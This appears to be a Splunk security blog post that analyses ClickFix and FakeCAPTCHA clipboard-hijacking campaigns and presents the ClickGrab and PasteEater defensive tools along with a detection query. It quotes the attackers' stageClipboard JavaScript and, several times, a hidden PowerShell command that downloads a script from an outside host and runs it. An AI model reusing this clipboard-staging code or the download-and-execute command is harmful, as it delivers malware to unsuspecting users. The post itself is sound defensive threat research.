Social engineering attacks continue to be among the most effective methods for delivering malware and compromising systems. Among these, a concerning trend has emerged and rapidly gained traction: "ClickFix" and "FakeCAPTCHA" campaigns. These sophisticated attacks exploit users' familiarity with everyday verification systems while leveraging clipboard manipulation techniques to deliver malicious payloads—all without exploiting a single technical vulnerability.
First observed in early 2024 and dramatically increasing in prevalence through 2025, these campaigns have evolved from simple criminal operations to sophisticated techniques now adopted by nation-state actors. What makes these attacks particularly concerning is their effectiveness despite requiring significant user interaction. By understanding the mechanics behind these campaigns, security teams can develop strategies to detect and prevent them before they compromise systems.
In this blog, we'll dissect the anatomy of ClickFix and FakeCAPTCHA campaigns, examine real-world code examples, track their evolution, and provide practical defensive strategies. We'll also introduce a specialized tool called "ClickGrab" that helps defenders analyze these threats and extract actionable intelligence to strengthen their security posture against these deceptive campaigns along with a method to intercept items added to the Windows clipboard using PasteEater.
At their core, these attacks represent a masterclass in social engineering. Unlike traditional malware delivery mechanisms that exploit software vulnerabilities, ClickFix and FakeCAPTCHA campaigns rely entirely on manipulating user behavior.
What makes these attacks remarkably effective is their psychological manipulation:
(FakeCAPTCHA example, Splunk 2025)
(FakeCAPTCHA Verify you are a human, Splunk 2025)
Let's examine an actual code snippet from a FakeCAPTCHA campaign we've analyzed:
function stageClipboard(commandToRun, verification_id) { const suffix = " # " const ploy = "✅ ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } // Later in the code: const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPath; stageClipboard(commandToRun, verification_id);
This code structure reveals the deceptive nature of these attacks. When a user clicks the verification button, the stageClipboard function executes, placing a PowerShell command into the clipboard followed by what appears to be a legitimate verification message.
The actual command portion (powershell -w hidden -c "iwr 'https://example.com/malicious.ps1' | iex") is designed to:
What victims see when they paste this into their command prompt or Run dialog is only the innocuous-looking part: ✅ ''I am not a robot - reCAPTCHA Verification Hash: 328459'', while the malicious command executes silently.
Through extensive analysis of ClickFix and FakeCAPTCHA campaigns using our ClickGrab tool, we've identified consistent patterns that reveal how these attacks are constructed. These commonalities not only help defenders recognize malicious sites but also provide valuable insights into the operational methods of the threat actors behind them.
Our analysis of recent campaigns shows repeated references to specific domains that help establish the facade of legitimacy:
Domain | Purpose in Attack |
---|---|
www.google.com | Primarily used to reference legitimate Google reCAPTCHA resources |
use.fontawesome.com | Used for loading legitimate icon fonts to enhance visual legitimacy |
cdnjs.cloudflare.com | Provides frontend frameworks that make fake interfaces appear professional |
These legitimate resources are deliberately mixed with malicious components to create a convincing user experience.
Nearly all FakeCAPTCHA campaigns share key visual elements:
The HTML structure of these fake verification systems follows surprisingly consistent patterns:
html
<div class="recaptcha-box"> <h2>Verify You Are Human</h2> <p>Please verify that you are a human to continue.</p> <div class="container m-p"> <div id="checkbox-window" class="checkbox-window m-p block"> <div class="checkbox-container m-p"> <button type="button" id="checkbox" class="checkbox m-p line-normal"></button> </div>
This structure is deliberately designed to mimic legitimate CAPTCHA implementations while hiding the malicious JavaScript operations that occur when users interact with the elements.
The core of the attack lies in the JavaScript code that manipulates the clipboard. Our analysis reveals that the majority of the malicious campaigns use document.execCommand("copy") to hijack user clipboards. This JavaScript function requires minimal permissions yet enables powerful attack capabilities.
A consistent pattern we see is the use of temporary textarea elements to stage the malicious content before copying it to the clipboard:
Perhaps the most distinctive signature of these campaigns is the recurring stageClipboard function, which we've found in 12 different campaigns with remarkably similar implementations:
javascript
function stageClipboard(commandToRun, verification_id) { const suffix = " # "; const ploy = "✅ ''I am not a robot - reCAPTCHA Verification Hash: "; const end = "''"; const textToCopy = commandToRun + suffix + ploy + verification_id + end; setClipboardCopyData(textToCopy); }
This function combines the malicious command with innocent-looking verification text, ensuring victims only notice the verification message when they paste the clipboard contents.
The malicious PowerShell commands follow distinctive patterns as well:
A typical command structure looks like:
powershell
powershell -w hidden -c "iwr 'https://[malicious-domain]/[path].ps1' | iex"
The initial clipboard hijacking is just the first step. Once executed, these attacks typically deploy various types of malware:
The most common payload is information-stealing malware designed to harvest sensitive browser data, including browsing history, saved passwords, cookies, and autofill information. These malicious programs target specific directories where browsers store user data, accessing and decrypting files to gain unauthorized access to personal information and credentials.
Common information stealers include:
RATs like NetSupport grant attackers persistent access to compromised systems, enabling continuous surveillance, data theft, and lateral movement within networks.
Common RATs deployed through these campaigns include:
Many campaigns deploy "droppers" that subsequently install multiple malware families on a single system:
Some campaigns have been observed deploying up to five distinct malware families from a single initial infection.
To help security teams stay ahead of these evolving threats, we've developed ClickGrab - a comprehensive analysis tool specifically designed to detect, analyze, and understand ClickFix and FakeCAPTCHA campaigns.
(ClickGrab Analysis site https://mhaggis.github.io/ClickGrab/, Splunk 2025)
ClickGrab is a powerful Python and PowerShell-based tool that helps security researchers and defenders identify and analyze malicious websites employing fake CAPTCHA verification systems for social engineering attacks. It bridges the gap between threat intelligence and practical defense by providing:
The tool operates in two main modes:
This mode allows security researchers to safely interact with suspicious websites while monitoring clipboard activity:
This non-interactive mode performs bulk analysis without requiring browser interaction:
ClickGrab incorporates sophisticated detection techniques to identify even well-hidden threats:
Security teams can access ClickGrab's capabilities through multiple interfaces:
# Run in analysis mode, looking for FakeCAPTCHA campaigns .\clickgrab.ps1 -Analyze -Tags "FakeCaptcha,ClickFix" # Limit analysis to 5 URLs and include older campaigns .\clickgrab.ps1 -Analyze -Limit 5 -IgnoreDateCheck # Filter for specific tags with debug output .\clickgrab.ps1 -Analyze -Tags "FakeCaptcha" -Debug
When ClickGrab analyzes a suspicious URL, it generates a comprehensive report like this:
{ "URL": "https://jessespridecharters.com/v/", "RawHTML": "...", "Base64Strings": [], "URLs": [ "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png", "https://www.google.com/intl/en/policies/privacy/", "https://www.google.com/intl/en/policies/terms/", "https://yogasitesdev.wpengine.com/2/15.ps1" ], "PowerShellCommands": [ "powershell -w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\"" ], "IPAddresses": [], "ClipboardCommands": [ "powershell -w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\" # ✅ ''I am not a robot - reCAPTCHA Verification Hash: 328459''" ], "SuspiciousKeywords": [ "I am not a robot", "Verification Hash", "reCAPTCHA Verification" ], "ClipboardManipulation": [ "document.execCommand(\"copy\")", "navigator.clipboard.writeText" ], "PowerShellDownloads": [ { "FullMatch": "iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex", "URL": "https://yogasitesdev.wpengine.com/2/15.ps1", "Context": "User clipboard hijacking" } ], "MSHTACommands": [] }
These detailed reports allow security teams to:
(PasteEater, Splunk 2025)
While understanding these threats is crucial, defenders also need practical tools to protect users. To address this challenge, Will Metcalf has developed "PasteEater" - a specialized Windows application designed to intercept and analyze clipboard content from browser processes before users can execute potentially malicious commands.
PasteEater acts as a protective layer between browser-based clipboard operations and the Windows clipboard system. Here's how it functions:
PasteEater is particularly effective against FakeCAPTCHA and ClickFix attacks because it:
Every organization's prevention appetite is different, therefore we share the following list of ideas and hope that one of the many will assist you in reducing your attack surface.
To help security teams defend against these deceptive campaigns, we've developed comprehensive detection content for Splunk. Our approach focuses on identifying the distinctive patterns and behaviors associated with FakeCAPTCHA attacks. We’ve developed an analytic story to assist organizations in quickly deploying content for these attacks.
This detection identifies potential FakeCAPTCHA/ClickFix clipboard hijacking campaigns by looking for PowerShell execution with hidden window parameters and distinctive strings related to fake CAPTCHA verification. These campaigns use social engineering to trick users into pasting malicious PowerShell commands from their clipboard, typically delivering information stealers or remote access trojans.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_powershell` AND ( (Processes.process IN ("* -w hidden *", "* -window hidden *", "* -windowstyle hidden *", "*-w h*", "*-wind h*", "*-windowstyle h*") OR Processes.process="*-w h*") AND ( (Processes.process IN ("*robot*", "*captcha-iogo*", "*Robot*", "*captcha-logo*", "*Captcha*", "*captcha-container*", "*captcha*", "*captcha-box*", "*CAPTCHA*", "*CaptchaListeners*")) OR ( (Processes.process IN ("*iwr *", "*Invoke-WebRequest*", "*wget *", "*curl *", "*Net.WebClient*", "*DownloadString*", "*[Convert]::FromBase64String*")) AND (Processes.process IN ("*|iex*", "*|Invoke-Expression*", "* iex *", "* Invoke-Expression *")) ) OR (Processes.process="*FromBase64String*" AND Processes.process="*iex*") ) ) by Processes.action Processes.dest Processes.original_file_name Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path Processes.process Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user Processes.user_id Processes.vendor_product | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
|
(FakeCAPTCHA caught by Splunk Query, Splunk 2025)
ClickFix and FakeCAPTCHA campaigns represent a sophisticated evolution in social engineering attacks, blending technical deception with human psychology. While they may seem simplistic compared to advanced exploit chains, their effectiveness lies in exploiting the most vulnerable component of any security system: human trust.
By leveraging tools like ClickGrab, PasteEater and other native Windows features, defenders can gain valuable insights into these threats, extract indicators of compromise, and develop effective countermeasures. As we continue to evolve our defenses, sharing information about these threats remains one of our most powerful tools.
Stay vigilant, and remember: a legitimate verification system will never ask you to copy-paste commands or open a command prompt.
The world’s leading organizations rely on Splunk, a Cisco company, to continuously strengthen digital resilience with our unified security and observability platform, powered by industry-leading AI.
Our customers trust Splunk’s award-winning security and observability solutions to secure and improve the reliability of their complex digital environments, at any scale.